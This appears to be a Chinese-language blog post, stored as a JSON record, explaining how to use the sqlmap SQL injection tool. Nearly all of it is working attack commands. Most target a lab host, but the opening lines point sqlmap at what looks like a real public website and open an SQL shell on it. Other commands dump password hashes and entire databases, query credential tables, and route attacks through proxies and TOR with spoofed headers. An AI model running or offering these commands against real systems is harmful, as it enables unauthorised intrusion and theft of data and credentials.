{"id":152,"title":"sqlmap使用说明","content":"更新\nsvn checkout https:\/\/svn.sqlmap.org\/sqlmap\/trunk\/sqlmap sqlmap-dev\nsqlmap.py -u \"http:\/\/www.islamichina.com\/hotelinchina.asp?cityid=2&m=1\" -v 1 --sql-shell \/\/执行SQL语句 \nsqlmap.py -u \"http:\/\/www.islamichina.com\/hotelinchina.asp?cityid=2&m=1\" -v 5 \/\/更详细的信息\nload options from a configuration INI file\nsqlmap -c sqlmap.conf \n使用POST方法提交\nsqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/oracle\/post_int.php\" --method POST --data \"id=1\"\n使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mssql\/cookie_int.php\" --cookie \"id=1\" -v 1\n使用referer欺骗\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" --referer \"http:\/\/www.google.com\" -v 3\n使用自定义user-agent,或者使用随机使用自带的user-agents.txt\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/oracle\/get_int.php?id=1\" --user-agent \"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\" -v 3\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" -v 1 -a \".\/txt\/user-agents.txt\"\n使用基本认证\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/basic\/get_int.php?id=1\" --auth-type Basic --auth-cred \"testuser:testpass\" -v 3\n使用Digest认证\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/digest\/get_int.php?id=1\" --auth-type Digest --auth-cred \"testuser:testpass\" -v 3\n使用代理,配合TOR\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" --proxy \"http:\/\/192.168.1.47:3128\"\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" --proxy \"http:\/\/192.168.1.47:8118\"\n使用多线程猜解\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" -v 1 --current-user --threads 3\n绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" -v 1 -p \"id\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1&cat=2\" -v 1 -p \"cat,id\"\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/ua_str.php\" -v 1 -p \"user-agent\" --user-agent \"sqlmap\/0.7rc1 (http:\/\/sqlmap.sourceforge.net)\"\n指定数据库,绕过SQLMAP的自动检测\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" -v 2 --dbms \"PostgreSQL\"\n* MySQL\n* Oracle\n* PostgreSQL\n* Microsoft SQL Server\n指定操作系统,绕过SQLMAP自动检测\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" -v 2 --os \"Windows\"\n* Linux\n* Windows\n自定义payload\nOptions: --prefix and --postfix\nIn some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and\/or postfix.\nExample on a MySQL 5.0.67 target on a page where the SQL query is: $query = \"SELECT * FROM users WHERE id=('\" . $_GET['id'] . \"') LIMIT 0, 1\";:\n$ python sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_str_brackets.php?id=1\" -v 3 -p \"id\" --prefix \"'\" --postfix \"AND 'test'='test\"\n[...]\n[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis\n[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'\n[hh:mm:16] [TRAFFIC OUT] HTTP request:\nGET \/sqlmap\/mysql\/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20\n%28%27test%27=%27test HTTP\/1.1\nAccept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7\nHost: 192.168.1.121:80\nAccept-language: en-us,en;q=0.5\nAccept: text\/xml,application\/xml,application\/xhtml+xml,text\/html;q=0.9,text\/plain;q=0.8,\nimage\/png,*\/*;q=0.5\nUser-agent: sqlmap\/0.7rc1 (http:\/\/sqlmap.sourceforge.net)\nConnection: close\n[...]\n[hh:mm:17] [INFO] GET parameter 'id' is custom injectable \n[...]\nAs you can see, the injection payload for testing for custom injection is:\nid=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test\nwhich URL decoded is:\nid=1') AND 7433=7433 AND ('test'='test\nand makes the query syntatically correct to the page query:\nSELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1\nIn this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.\n页面比较\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int_refresh.php?id=1\" --string \"luther\" -v 1\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int_refresh.php?id=1\" --regexp \"<td>lu[\\w][\\w]er\" -v \n排除网站的内容\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int_refresh.php?id=1\" --excl-reg \"Dynamic content: ([\\d]+)\"\n多语句测试，php内嵌函数mysql_query(),不支持多语句\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" --stacked-test -v 1\nunion注入测试\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/oracle\/get_int.php?id=1\" --union-test -v 1\nunionz注入配合orderby\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_str.php?id=1\" --union-test --union-tech orderby -v 1\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mssql\/get_int.php?id=1\" -v 1 --union-use --banner\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" -v 5 --union-use --current-user\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int_partialunion.php?id=1\" -v 1 --union-use --dbs\nfingerprint\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mssql\/get_int.php?id=1\" -v 1 -f\npython sqlmap.py -u \"http:\/\/192.168.123.36\/sqlmap\/get_str.asp?name=luther\" -v 1 -f -b\n判断当前用户是否是dba\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" --is-dba -v 1\n列举数据库用户\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" --users -v 0\n列举数据库用户密码\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" --passwords -v 0\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mssql\/get_int.php?id=1\" --passwords -U sa -v 0\n查看用户权限\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/oracle\/get_int.php?id=1\" --privileges -v 0\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" --privileges -U postgres -v 0\n列数据库\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mssql\/get_int.php?id=1\" --dbs -v 0\n列出指定数据库指定表的列名\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" --columns -T users -D test -v 1\n列出指定数据库的指定表的指定列的内容\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mssql\/get_int.php?id=1\" --dump -T users -D master -C surname -v 0\n指定列的范围从2－4\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" --dump -T users -D test --start 2 --stop 4 -v 0\n导出所有数据库，所有表的内容\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" --dump-all -v 0\n只列出用户自己新建的数据库和表的内容\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mssql\/get_int.php?id=1\" --dump-all --exclude-sysdbs -v 0\nsql query\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" --sql-query \"SELECT usename FROM pg_user\" -v 0\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/mysql\/get_int.php?id=1\" --sql-query \"SELECT host, password FROM mysql.user LIMIT 1, 3\" -v 1\nSELECT usename, passwd FROM pg_shadow ORDER BY usename\n保存和恢复会话\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" -b -v 1 -s \"sqlmap.log\"\n保存选项到INC配置文件\npython sqlmap.py -u \"http:\/\/192.168.1.121\/sqlmap\/pgsql\/get_int.php?id=1\" -b -v 1 --save","sort":"99","view":"17740","addtime":"1428484860","password":"","tagname":false,"sorts":"Other"}